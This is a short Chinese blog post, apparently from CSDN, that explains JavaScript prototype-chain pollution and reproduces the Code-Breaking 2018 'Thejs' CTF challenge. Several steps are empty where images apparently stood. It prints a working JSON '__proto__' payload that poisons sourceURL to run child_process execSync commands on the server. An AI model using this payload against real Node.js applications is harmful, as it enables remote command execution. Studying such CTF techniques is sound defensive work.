原型链污染

一 原型链污染原理
prototype是一个类的属性,所有类对象在实例化的时候将会拥有prototype中的属性和方法
一个对象的__proto__属性,指向这个对象所在的类的prototype属性
例如 foo.__proto__指向的是Foo类的prototype。那么,如果我们修改了foo.__proto__中的值,意味着就可以修改Foo类

 

二,简单的原型链污染实验

foo是一个简单的JavaScript对象

foo.bar 此时为1

 

由于查找顺序的原因,foo.bar仍然是1 

此时再用Object创建一个空的zoo对象 

查看zoo.bar

查看结果 

 分析

三, Code-Breaking 2018 Thejs原型链污染复现

1,运用的知识点

 

2,原理分析 //…merge 给sourceURL赋值 实现任意命令执行 通过原型链污染实现// 

//…new Function(x, ‘return y’) 相当于function add(x){ return }// 

 

{"__proto__": {"sourceURL": "\u000areturn ()=>{for (var a in {}) {delete Object.prototype[a];} 
return global.process.mainModule.constructor._load('child_process').execSync('id')}\u000a//"}

 

//nodejs中有一个模块叫做process process底下有一个子模块叫chid_process
,其下有一个方法叫做execSync(‘whoami’)执行命令//

return global.process.mainModule.constructor._load(‘child_process’).execSync(‘id’)}\u000a//"}}
让原来的return失效,新的return把它替换掉 通过\u000a换行符把return换下来,再注释掉

{“proto”: {“sourceURL”: "\u000areturn ()=>{for (var a in {})
{delete Object.prototype[a];} 干什么?为了不让其他人看见这个flag,所以我把这个flag删除了
//{delete Object.prototype[a];}将object对象中的所有属性循环出来,再进行删除
三,复现

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值